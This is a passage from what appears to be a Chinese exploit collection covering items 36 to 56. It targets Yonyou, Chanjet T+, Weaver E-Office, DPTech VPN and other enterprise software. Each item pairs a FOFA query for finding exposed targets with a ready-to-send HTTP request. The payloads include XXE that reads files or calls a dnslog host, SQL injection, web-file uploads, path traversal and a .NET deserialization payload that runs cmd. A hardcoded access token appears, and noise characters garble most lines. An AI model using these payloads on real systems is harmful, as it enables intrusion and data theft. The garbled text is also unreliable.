User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info+ n! c! d# N( U; ?/ {0 W
Accept-Encoding: gzip, deflate
6 ^ M% w; V- p$ I1 aAccept: */*
/ g$ i4 @2 X6 [( I: JConnection: close" T$ o" m2 I2 [* t7 a+ L! i) ?
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA \, {, ?; m3 L+ A$ N% {
Content-Length: 190! s# W/ t, D" O* r5 @7 v' _ W
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
; s4 v+ o- [( ^, R4 j) V/ V' X- ] y* y
--fd28cb44e829ed1c197ec3bc71748df05 z w; F; S" l$ A
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
$ }. t% ]/ x1 Q2 V9 M) U9 I' D
<%out.println(1111*1111);%>
/ C6 K% w% \4 J0 T4 `6 r--fd28cb44e829ed1c197ec3bc71748df0--
9 ~% d( n9 y% U) z
: j3 E( V7 N2 t: x3 @
1 U/ {2 L, K- _7 Q; ~36. 用友NC-Cloud soapFormat XXE
- b8 n/ I* w9 \4 QFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/", @0 z; k9 S* m$ [& {: h- o1 V
POST /uapws/soapFormat.ajax HTTP/1.1
! r& j K. A( c/ I( XHost: 192.168.40.130:8989
8 b$ F) v2 E* G9 N5 q& l2 m. ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0% s1 e0 J: \1 i( R
Content-Length: 263
4 D, f M* b6 r5 N* W4 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 G! \ \- p) ]. e# S7 ^; B2 jAccept-Encoding: gzip, deflate) J; g6 n2 N% _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ K$ j5 u5 h) p h
Connection: close
( m% \/ x. ?5 R- f" {1 U6 LContent-Type: application/x-www-form-urlencoded
# {. \) W( O) @0 P. m# A+ \2 O+ iUpgrade-Insecure-Requests: 11 |+ K8 T" [$ q7 a% V: X
, {! o' [4 V* I3 x4 H! B; A; J
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
3 l5 w; i9 n) d6 D0 `- U# F" ?
; G# j! D! R M7 X, }
" A9 D5 P! b4 ~7 Z; b37. 用友NC-Cloud IUpdateService XXE/ L8 D( \! a! P$ ?4 V
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"" [; t: |& W4 R( b0 v% o
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1: E0 `" x- p e
Host: 192.168.40.130:8989
O' b: ^# {# ^$ _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36, v" d& \) c& K5 m5 P
Content-Length: 421
3 s9 p& B! g% V+ e% j! L& [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.93 H- c a# A$ U* h) E
Accept-Encoding: gzip, deflate7 y+ c1 v6 y- o3 b. E5 {
Accept-Language: zh-CN,zh;q=0.9
) W6 J9 [- i, f! L8 Q# {$ YConnection: close
& A* R# t7 n$ j/ F6 i0 fContent-Type: text/xml;charset=UTF-8
) N+ |) l- p' S4 YSOAPAction: urn:getResult& E v) D n! X- F' z
Upgrade-Insecure-Requests: 1
8 C1 w+ w3 I, [ w, [0 _6 W
6 S+ A6 V( ?# X! s) a9 G- p<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
* ?0 G% \+ a; Y) O- H<soapenv:Header/>$ V9 n( d( O6 `7 S( A; M0 {) ~0 ~
<soapenv:Body>* T" `8 v" ?2 @% l& Q# {1 o0 {
<iup:getResult>
" l' x( O X0 O3 E<!--type: string-->
7 x2 J9 J. a) b' T2 v5 W4 W2 K. v<iup:string><![CDATA[
( b0 x% }6 v/ b6 e0 B<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
+ {, @; b" B$ a7 G( T<xxx/>]]></iup:string>
) v- i! m3 Z1 |- O' t, ]</iup:getResult>6 n8 N- {; T/ K2 A* n: r
</soapenv:Body>
8 Z3 h% S3 }+ g, `</soapenv:Envelope>. d9 V- y, J4 ], h0 n
, x1 u+ b3 v0 W# Q6 z: ?# r
1 \1 ?( w1 w/ i; T. u9 W! k7 h6 \7 g6 h) v" g2 C- S6 t
38. 用友U8 Cloud smartweb2.RPC.d XXE
. l2 j$ X. C! X- tFOFA:app="用友-U8-Cloud"
: ~( _8 |' M4 y- S' a% VPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
5 b7 I: {# f9 l8 S( dHost: 192.168.40.131:8088
; o2 t% F' W$ } f' A0 F0 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.254 o, w3 \8 r! z: T# z: ]
Content-Length: 260
: C _4 W5 w* B+ M5 F! AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
& Z0 ^0 S3 Q3 [3 [Accept-Encoding: gzip, deflate
* C9 f+ c& S1 j" GAccept-Language: zh-CN,zh;q=0.90 c3 i; y- ~0 a
Connection: close A; n' R9 O; r& d# e3 ^* R5 }
Content-Type: application/x-www-form-urlencoded
( I+ [4 j2 T" Q( {, a( ~8 Z2 R" `( l( z- w
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
2 A9 c: P* R' A4 g2 ?3 p- n' K- m- \% G: N1 Q* F( Y. E% D1 ?
6 v' W' ]9 f# C% ~: n/ M
39. 用友U8 Cloud RegisterServlet SQL注入
% D; h" k8 }& _1 k ]$ [FOFA:title="u8c"3 y$ b. d/ p) }, d
POST /servlet/RegisterServlet HTTP/1.1
; w/ I" K% }$ u$ ]% n8 oHost: 192.168.86.128:8089
; X* e8 i- B" H: J# e6 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
3 Q! J$ F4 B' P9 MConnection: close
z1 e) m5 F# v% R1 H0 q `5 N# eContent-Length: 85
* n1 ^# N0 `2 u- e6 T4 Q3 yAccept: */*
3 u Z' [! l/ p# g$ w3 s, {/ }$ DAccept-Language: en1 F. ]! J) ]; p1 n5 y
Content-Type: application/x-www-form-urlencoded6 u' G" G+ y3 O8 A3 ~
X-Forwarded-For: 127.0.0.1
1 P8 U' a/ R/ w0 ^0 h6 xAccept-Encoding: gzip
) L; f) i. L+ o7 _' f3 k+ @& M" q# |& J7 ]
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--# Z5 y) T% p6 F. d0 ?- r2 r6 E
8 r9 z3 b8 r, b1 u! O% b+ v, p% ~6 ?+ G/ X! d5 e7 x& T1 L t9 l3 s7 J
40. 用友U8-Cloud XChangeServlet XXE
: D, c3 W5 [* B; j! n' X' jFOFA:app="用友-U8-Cloud"
& j P( n+ m4 x( y5 m0 GPOST /service/XChangeServlet HTTP/1.1
3 V. G% r( s9 l, |7 vHost: x.x.x.x
9 N' n" U+ L, A6 G1 H0 O5 {User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- L8 W" S3 B" m4 M; JContent-Type: text/xml
' M0 ^' Y3 a$ N3 `Connection: close! T# Q2 z' ~! \$ V9 S
; f0 W+ e5 W* s& G5 R) F6 K+ L<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
P' J8 \5 y* ]
. `# u6 Z1 r4 n' ]( d# Z) ?- l7 x& r8 ?2 S3 Z% S+ R" P; z( B
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
" D) {1 h' C& YFOFA:app="用友-U8-Cloud"6 r" `$ z- R$ G0 m
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1% W3 \( Z5 w. }+ ~( y( {
Host:
1 R3 L2 D. ^7 I- {# I( g6 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 P+ z# f4 m+ {. i( x8 N/ Y
Content-Type: application/json
8 n. R9 w. d8 F& j& l( ?Accept-Encoding: gzip% L- }; N0 e/ o
Connection: close$ C, i2 {' N" ~; q
; N X, O, \) ?& S* h) c& _4 Q9 z X+ q
42. 用友GRP-U8 SmartUpload01 文件上传
7 E# v2 {. X7 g1 D+ m- C7 Z# GFOFA:app="用友-GRP-U8"
5 j, r) T9 T: N f# e; EPOST /u8qx/SmartUpload01.jsp HTTP/1.1
5 Y' D; w3 X2 Q% ?) KHost: x.x.x.x5 h2 r0 K# v: o T, _4 ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt/ \. M0 H; z4 R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.362 {& U* @4 s( v4 I. n6 N, t' ]
( v, [/ A3 m4 V: M/ `# @: J) N0 X
PAYLOAD
, L& s7 |& Y8 D& x$ a9 e, K' p; ?) l( f1 y( } i5 Q: ?
: Y/ Y+ {: f. D8 I# ^http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
0 y9 ^7 |( l+ I/ b. R
9 }0 f" o& [! Z5 }& I43. 用友GRP-U8 userInfoWeb SQL注入致RCE4 G5 u- _% _: ]& U- ?
FOFA:app="用友-GRP-U8"
% Z" @3 y% P$ R9 x5 {$ zPOST /services/userInfoWeb HTTP/1.1
6 s7 @9 L' A2 C1 A8 C* LHost: your-ip
|3 b* y% }( `9 d5 ~# ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36& I/ P: X* O9 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& Z$ k; E- @. f9 K' d; y* EAccept-Encoding: gzip, deflate
# u o9 h2 {, F. @) aAccept-Language: zh-CN,zh;q=0.9
& Q/ S8 w- d' j" p+ ?Connection: close# V; \5 _) @* ^/ m
SOAPAction:
$ P ~6 R" a/ ^6 x% z! R D; a8 IContent-Type: text/xml;charset=UTF-8
5 f% E/ ?$ }6 K
; F1 ^: ~' ]+ o& W8 `<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">( k) E( d& r6 \: ?' N
<soapenv:Header/>
O+ a# P& X: ?8 V6 F$ s: F, ] <soapenv:Body>- K, {# D2 g0 t: k7 G. V/ b, b
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
- X( J) L, ?1 T, m" P <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
( B6 U8 L2 k1 b2 v$ [5 h* A </ser:getUserNameById>
& e5 ~3 l! Z: |/ w' b! x </soapenv:Body>+ r ~1 `0 i% q, n, c
</soapenv:Envelope>
% S. @7 t; n/ h7 A# P; f! T) T, {6 e5 i+ |) {
! _7 O2 n2 y) Y0 p, r
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
. z# u+ N# I2 b" ^& DFOFA:app="用友-GRP-U8"$ J" e/ |5 }( b+ q$ l7 {% H# z# E
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
) D3 c# k2 }! F, x4 f, ^$ THost: your-ip4 B9 @2 n' S4 \: L# q$ d3 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36, A! V5 I$ N! V; R: N3 }3 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ Y) j; |; X' Y2 J9 c/ P- R
Accept-Encoding: gzip, deflate
5 [ F" k! v- GAccept-Language: zh-CN,zh;q=0.9
, M( }8 p. Y4 u. rConnection: close
+ v& w7 d$ C6 ~6 S8 d9 K8 A* L; d& E
+ P7 Z! A: C0 v4 T2 u0 Q
45. 用友GRP-U8 ufgovbank XXE+ K, ]3 s: {$ i- ?4 E" @- a X
FOFA:app="用友-GRP-U8"2 Y% o' H; H( [
POST /ufgovbank HTTP/1.1
8 k c+ _( a) T6 KHost: 192.168.40.130:222& Z& [# j% U! I1 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
$ x' [7 M, V. q6 }1 O5 C/ s* |Connection: close
: W& P2 x4 v& Y4 j: oContent-Length: 161/ c* O9 c- t" J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' ?8 S1 u2 X$ G% _8 [, z& _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 C0 O) j6 C8 V! `: O2 y# p
Content-Type: application/x-www-form-urlencoded
. }4 @; H+ \$ n8 m+ D3 j8 ~Accept-Encoding: gzip
1 r: G0 }2 j- q6 p7 i; B7 }; {- E4 f( f: v3 i+ @. X) [( o
reqData=<?xml version="1.0"?>6 Q9 V' ^2 \( q
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
0 u$ j. L( G! k/ ~+ Y" o, L; n: U
1 x, J6 ^0 |7 T$ u% ]9 L* ^0 L0 n
4 f5 ?7 o" l1 S- W( Z# x# B46. 用友GRP-U8 sqcxIndex.jsp SQL注入
, E( m- T5 |0 }( T& MFOFA:app="用友-GRP-U8"
9 I' ]8 X7 ?2 I; u* y9 O: ~GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1( d- w. _8 @/ w, Y
Host: your-ip
2 e2 H2 E3 _! M: r% I" MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
/ O$ l3 ^$ o4 k( }; u! FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 n5 e: \' ?, i5 d, ]0 l* z: h/ B+ WAccept-Encoding: gzip, deflate
5 \/ j3 N! O) g7 kAccept-Language: zh-CN,zh;q=0.9
% {& }) d, f* g4 z' k5 TConnection: close
6 C3 W: Y1 N3 Q
$ \8 Z0 m# N' l& X, W' P5 a- t% m! [. \5 k
47. 用友GRP A++Cloud 政府财务云 任意文件读取+ o j- m1 [' W- R* |
FOFA:body="/pf/portal/login/css/fonts/style.css"
! B% Q$ X6 }5 W2 \GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
$ `8 k- @& q1 k0 O) {Host: x.x.x.x m3 u8 {: c6 F7 Y
Cache-Control: max-age=0
9 j; ^1 S; r; l2 G, {Upgrade-Insecure-Requests: 1( M. \9 g# ?% c. S+ {. l- u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' q8 x# ?/ b% U. Q+ Q8 s% u( eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 n( x- d# v, \5 KAccept-Encoding: gzip, deflate, br$ ]1 H9 o' g2 { g
Accept-Language: zh-CN,zh;q=0.9/ ] J( T* e+ h( O; f7 D; B
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
: _ x5 a3 z8 C; F$ Z6 I7 GConnection: close- j, ]3 p9 P+ ~& e( t) x+ A; `
2 `6 L3 m! a; h% ^2 e
0 Y% Y- D9 c. r- C p
9 w c' Y0 f d0 A4 Y
48. 用友U8 CRM swfupload 任意文件上传
& B1 {6 h. }9 U+ ]1 yFOFA:title="用友U8CRM"4 H$ g7 k6 u- _" i
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
0 T# |0 N/ Q1 j4 q2 F# |Host: your-ip f) E& Q' t T3 f% t3 f8 B% p& b* m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- s/ }. X. F, ^9 W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" z5 k7 a7 ^; ~8 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# q2 z9 Z. q/ {
Accept-Encoding: gzip, deflate
6 ^! }9 B1 I: j/ ]/ p8 _3 ZContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
& m" e: \5 I1 S------2695209672394068716424300668557 Y J k t- w
Content-Disposition: form-data; name="file"; filename="s.php"3 ?& `. e3 u- w: b* K9 @5 p. @6 O
1231
; ~) z2 v6 t% ~+ e4 `' h+ BContent-Type: application/octet-stream
. m! l2 ? D7 e0 [# G) S------269520967239406871642430066855; w2 G6 E/ h6 H% D
Content-Disposition: form-data; name="upload"9 E2 n+ Y! c4 @3 i3 }. H% y
upload2 Z$ c8 H# K3 y* \+ N
------269520967239406871642430066855--% ~; }9 H) a I7 R& R. h* {0 m c
5 A2 A0 J( ]' |6 L1 W6 B3 Q; g+ |) ~$ {$ `6 p2 Q
49. 用友U8 CRM系统uploadfile.php接口任意文件上传- U* N `1 i" Y' c- J0 S- S/ r9 y
FOFA:body="用友U8CRM"
+ K9 U% E& \8 {- N* s
n" J6 q" {4 h# hPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.19 u, `" q& B. p! p+ [( s& T
Host: x.x.x.x
8 N: Y( J% K x1 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
0 g# C! h* }1 R& v: C1 l7 bContent-Length: 329/ A3 j$ Q( [. ~5 H+ j4 \- j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* p" R- V& Z8 ?+ y
Accept-Encoding: gzip, deflate! J b1 g8 G) G! T2 R+ m0 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& c9 j5 a% O- m/ T R+ [1 HConnection: close) O3 W4 `/ d% W
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w& _/ P. x( l5 l2 ]5 t f
/ _$ v3 I0 [9 J: h7 D9 ~% r# u
-----------------------------vvv3wdayqv3yppdxvn3w1 O& O0 W& o8 `( {. @
Content-Disposition: form-data; name="file"; filename="%s.php ") }* F, B p9 S$ C9 A
Content-Type: application/octet-stream1 r8 l$ M. D) B# x2 R- S @
9 |- p$ M. [) j& w
wersqqmlumloqa8 F c- w% [& j9 A$ p3 U
-----------------------------vvv3wdayqv3yppdxvn3w
) u3 m. h6 F4 M/ b+ ?' v" C- s9 e2 _! PContent-Disposition: form-data; name="upload"' i0 C9 C! A, L& T4 G+ O4 g' B) S% o
+ N1 L! v, K4 N6 D3 ?upload
~+ q5 C w( C/ n; K. U( P-----------------------------vvv3wdayqv3yppdxvn3w--
7 \3 P \% O2 w& y. y
& `2 a8 A5 a$ }0 Q4 N
v3 E2 D# b/ l1 V8 \$ `- N3 c+ Z; ?http://x.x.x.x/tmpfile/updB3CB.tmp.php
- j; m% T; D9 ^6 J0 ~* h* z* u; j9 W. w/ u' f# F4 z- R
50. QDocs Smart School 6.4.1 filterRecords SQL注入
& m2 d. ^2 v6 h i# {% O! VFOFA:body="close closebtnmodal"0 |* n* V% }% ^+ O! M2 f
POST /course/filterRecords/ HTTP/1.1
, a* I1 \4 _# ~/ lHost: x.x.x.x
) F2 Y0 v" G9 z2 |User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
X$ R) u: I& ^) H# kConnection: close
# a3 F6 m8 A% R T& M6 @Content-Length: 224
. D$ y: W" v5 d1 n. ]Accept: */*
9 N& k3 Z2 k* qAccept-Language: en
& v2 o' e+ D9 s7 Q+ l7 S% M% IContent-Type: application/x-www-form-urlencoded
' G% e. ?6 I R) MAccept-Encoding: gzip
: l4 S% x! A2 V) I* T8 O3 h$ O6 ]* p- F9 v: \
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=16 K a) A; m5 e* P9 E) \8 l. ^# T
3 p+ X: E4 _' y' T
/ I# p% |" u, O' Q6 r5 F51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入' S, b, V3 ~1 X
FOFA:app="云时空社会化商业ERP系统"" \/ i; ~9 n- K
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
3 s h2 M/ p; U0 \8 L) q! T2 H2 kHost: your-ip
- \2 Z# p$ C2 D5 ~2 k+ \User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.367 N) B$ ~8 c* j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
6 z) E* i# X8 I3 z$ d0 |& j6 KAccept-Encoding: gzip, deflate& L7 n" J; ^# z9 `
Accept-Language: zh-CN,zh;q=0.9
' q1 O$ l0 d. e/ z$ WConnection: close
. H/ _* y. f! u
- a7 p, d- p2 }; o9 T4 M$ c
d% v3 y ]9 K9 D, Z, s52. 泛微E-Office json_common.php sql注入
$ w8 n% m7 R& ?8 e; e% h- Q7 zFOFA:app="泛微-EOffice"% k2 Q4 i7 R4 i0 F6 g( s
POST /building/json_common.php HTTP/1.1( y9 B' \) g2 t/ M! F
Host: 192.168.86.128:8097
; y% d% j' r; \4 M6 x* _3 NUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. D% x6 ~) @; B/ K3 L4 b1 NConnection: close9 w! Y6 A; s# V/ @8 R, e5 p
Content-Length: 87
( m+ t& h( x, V5 A; ?2 FAccept: */*
$ p( U/ r( q# u `; iAccept-Language: en
# H1 H' N3 P# tContent-Type: application/x-www-form-urlencoded- k3 S5 Y H' O
Accept-Encoding: gzip
8 u. j0 [: V& ?& f. q/ O5 E
! J7 K7 V+ |: w5 etfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
; k. I6 h7 ^! ^2 I
% l: W: b A( i! @% b; c Q, t! o# R$ e" D: ]8 ~ N
53. 迪普 DPTech VPN Service 任意文件上传& o: ?" V; ~0 {3 X e* M( w
FOFA:app="DPtech-SSLVPN"# F3 x7 C" n; X" f; X
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
# a X' [# x3 X$ v# J' a) E
0 l# i8 z9 G2 F/ K. r/ R0 N3 d& X7 L8 s( p3 s
54. 畅捷通T+ getstorewarehousebystore 远程代码执行' a- I \2 C: X- H: C& d
FOFA:app="畅捷通-TPlus"# {5 g4 J0 f* Z6 E; _% ]" ]1 N
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件9 w1 L: P+ X6 B2 ]& K
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
! T, J4 L z4 d6 L' c. L
$ t: o- b5 Y: C- t
: G( Y: w; h3 @6 x完整数据包
2 ?& n% H7 J6 d0 R1 ^& HPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
' l/ ? P( J- c" I7 p) RHost: x.x.x.x
: _: m6 R6 r. u! x3 A+ b, sUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F8 c* D4 s" L3 k- Y, E' s, M
Content-Length: 593. n/ f9 ]3 h4 {9 c
8 s% d& k5 E J: P8 h
{! g8 V9 ~ F& _
"storeID":{5 f: }" F! g8 }1 [- I! ^
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",8 @' ?; ^9 m5 J g" A) r. `9 P
"MethodName":"Start",
& {7 u/ d# C( E! {' P$ ?( z1 y "ObjectInstance":{
/ \& N# d) @0 a% ~% H$ [+ R "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",: r0 b8 z, H( e+ y9 m$ r+ l
"StartInfo":{
/ U8 d! P3 n/ G' ?5 [ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",8 c( U* ^; X$ s8 ]& q
"FileName":"cmd",+ p9 t- @" g1 R# U* u
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
3 H: T' X* M h; [9 ? }
+ T; d3 T8 I: b( ~0 D }
0 E' ?& M! X1 H1 G7 x. D( m }& M) [6 W8 p1 i" S
}
+ L' u$ e& f: L6 |' p5 S: z/ k# z3 @; B/ Z
- I9 E+ i- i- r: F5 y4 j x
第二步,访问如下url
5 u2 g# o' i, Z7 S9 C# |1 d, [- \/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
2 A1 j+ y- O. d7 @9 l0 ~
/ ^- S& W {8 _+ t$ E; R& \5 X
) u0 z$ m, X- E% v: D55. 畅捷通T+ getdecallusers信息泄露% ~: s+ G( v r0 A
FOFA:app="畅捷通-TPlus": ~. f- f" w( _7 E4 a7 v3 b# g- U: U
第一步,通过$ ^6 A" \3 r- }8 f2 |
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
) t7 l2 ^' Z! G6 Q+ ~ J8 J第二步,利用获取到的Cookie请求
+ O) ?: Q- o( `+ Y. N3 a. [/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers* A6 M0 P) _. m* F# W1 U
/ H' H* c# C0 j, G8 f+ a' g0 N56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE, v7 u. ?% V+ h
FOFA: app="畅捷通-TPlus"
' v! v: L z7 z5 h7 mPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.11 \" e2 \$ Q; S8 U+ n
Host: x.x.x.x
+ }, F( p6 ]( q/ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.362 p0 H& `0 U, w4 F0 O/ u7 |- C
Content-Type: application/json/ v2 _# r$ {' [1 |
2 E5 m4 l1 H; @) n! B{
9 {& W @0 ^3 u4 D% W "storeID":{
